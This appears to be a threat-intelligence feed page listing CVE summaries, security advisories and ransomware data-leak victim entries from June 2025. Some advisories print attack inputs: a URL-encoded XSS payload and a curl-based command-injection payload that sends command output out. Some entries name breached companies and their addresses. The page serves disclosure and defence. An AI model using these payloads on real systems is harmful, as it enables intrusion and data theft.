CyberAlerts is shutting down on June 30th, 2025. Thank you for your support!
Threat and Vulnerability Intelligence Database
Example Searches:
CVE
Threat Actors
Countries
Vendors
Severity
Known Exploited
CVE-2025-49004 |
Description: Caido is a web security auditing toolkit. Prior to version 0.48.0, due to the lack of protection for DNS rebinding, Caido can be loaded on an attacker-controlled domain. This allows a malicious website to hijack the authentication flow of Caido and achieve code execution. A malicious website loaded in the browser can hijack the locally running Caido instance and achieve remote command execution during the initial setup. Even if the Caido instance is already configured, an attacker can initiate the authentication flow by performing DNS rebinding. In this case, the victim needs to authorize the request on dashboard.caido.io. Users should upgrade to version 0.48.0 to receive a patch.
CVSS: HIGH (7.5) EPSS Score: 0.2%
June 9th, 2025 (5 days ago)
|
|
CVE-2024-22818 |
Description: FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerbility via /system/site/filterKeyword_save
EPSS Score: 0.09% SSVC Exploitation: poc
June 9th, 2025 (5 days ago)
|
|
CVE-2024-1026 |
Description: A vulnerability was found in Cogites eReserv 7.7.58 and classified as problematic. This issue affects some unknown processing of the file front/admin/config.php. The manipulation of the argument id with the input %22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-252293 was assigned to this vulnerability. Eine problematische Schwachstelle wurde in Cogites eReserv 7.7.58 gefunden. Betroffen davon ist ein unbekannter Prozess der Datei front/admin/config.php. Durch Manipulieren des Arguments id mit der Eingabe %22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen.
CVSS: LOW (3.5) EPSS Score: 0.05% SSVC Exploitation: none
June 9th, 2025 (5 days ago)
|
|
CVE-2024-0721 |
Description: A vulnerability has been found in Jspxcms 10.2.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Survey Label Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251545 was assigned to this vulnerability. In Jspxcms 10.2.0 wurde eine Schwachstelle gefunden. Sie wurde als problematisch eingestuft. Es geht um eine nicht näher bekannte Funktion der Komponente Survey Label Handler. Durch Manipulieren mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung.
CVSS: LOW (3.5) EPSS Score: 0.15% SSVC Exploitation: none
June 9th, 2025 (5 days ago)
|
|
Description: Summary
The 'gitImportSite' functionality obtains a URL string from a POST request and insufficiently validates user input. The ’set_remote’ function later passes this input into ’proc_open’, yielding OS command injection.
Details
The vulnerability exists in the logic of the ’gitImportSite’ function, located in ’Operations.php’. The current implementation only relies on the ’filter_var’ and 'strpos' functions to validate the URL, which is not sufficient to ensure absence of all Bash special characters used for command injection.
Affected Resources
• Operations.php:2103 gitImportSite()
• //system/api/gitImportSite
PoC
To replicate this vulnerability, authenticate and send a POST request to the 'gitImportSite' endpoint with a crafted URL in the JSON data. Note, a valid token needs to be obtained by capturing a request to another API endpoint (such as 'archiveSite').
Start a webserver.
Initiate a request to the ’archiveSite’ endpoint.
Capture and modify the request in BurpSuite.
Observe command output in the HTTP request from the server.
Command Injection Payload
http:///.git;curl${IFS}/$(whoami)/$(id)#=abcdef
Impact
An authenticated attacker can craft a URL string that bypasses the validation checks employed by the ’filter_var’ and ’strpos’ functions in order to execute arbitrary OS commands on the backend server. The attacker can exfiltrate command output via an HTTP request.
References
https://github.com/haxtheweb/issues/security/advisories/GHSA-g4cf-pp4x-hqgw...
June 9th, 2025 (5 days ago)
|
|
Description: During the opening keynote at Gartner Security & Risk Management Summit 2025, analysts weighed in on how CISOs and security teams can use security fervor around AI and other tech to the betterment of their security posture.
June 9th, 2025 (5 days ago)
|
|
|
Description: Impact
Pion Interceptor versions v0.1.36 through v0.1.38 contain a bug in a RTP packet factory that can be exploited to trigger a panic with Pion based SFU via crafted RTP packets, This only affect users that use pion/interceptor.
Patches
Upgrade to v0.1.39 or later, which includes PR #338 which validates that: padLen > 0 && padLen <= payloadLength and return error on overflow, avoiding panic.
If upgrading is not possible, apply the patch from the pull request manually or drop packets whose P-bit is set but whose padLen is zero or larger than the remaining payload.
Workarounds
At the application layer, reject any RTP packet where:
hasPadding (P-bit field) == true && (padLen == 0 || padLen > packetLen – headerLen)
before passing it to Pion’s packet factories.
References
Commit fixing the bug: https://github.com/pion/interceptor/commit/fa5b35ea867389cec33a9c82fffbd459ca8958e5
Pull request: https://github.com/pion/interceptor/pull/338
Issue: https://github.com/pion/webrtc/issues/3148
References
https://github.com/pion/interceptor/security/advisories/GHSA-f26w-gh5m-qq77
https://github.com/pion/webrtc/issues/3148
https://github.com/pion/interceptor/pull/338
https://github.com/pion/interceptor/commit/fa5b35ea867389cec33a9c82fffbd459ca8958e5
https://github.com/advisories/GHSA-f26w-gh5m-qq77
June 9th, 2025 (5 days ago)
|
|
Description: San Jose Country Club is a premier family-friendly private golf club located in Northern California, established in 1899 and known for its rich tradition. The club offers year-round golf, dining options, and various social activities, making it a sought-after destination for members in the Bay Area. It features a newly remodeled clubhouse and event facilities for hosting weddings and special events. Catering to golf enthusiasts and families alike, the club emphasizes superior service and exclusive dining experiences.
company is headquartered in 15571 Alum Rock Ave San Jose, CA 95127
The total amount of data leakage is 117.5 GB
June 9th, 2025 (5 days ago)
|
|
|
Description: Hartwig Mechanical Inc is a company that operates in the Commercial & Residential Construction industry. It employs 10to19 people and has 1Mto5M of revenue. The company is headquartered in 20800 E. Brink Street Harvard, IL 60033
The total amount of data leakage is 456 GB
June 9th, 2025 (5 days ago)
|
|
|
Description: Bumfords has been delivering reliable and competitive heating and plumbing solutions since 1968, specializing in services such as boiler installation, underfloor heating, and bathroom installations. The company prides itself on professionalism, honesty, and integrity while catering primarily to homeowners across South Yorkshire and Derbyshire. They also offer additional services including air conditioning, servicing and repairs, and boiler finance options. As a Worcester Bosch accredited installer, Bumfords emphasizes energy efficiency and customer satisfaction.
Bumford's corporate office is located at Unit 2D Shortwood Business Park, Shortwood Court, Hoyland, Barnsley, South Yorkshire, S74 9LH.
June 9th, 2025 (5 days ago)
|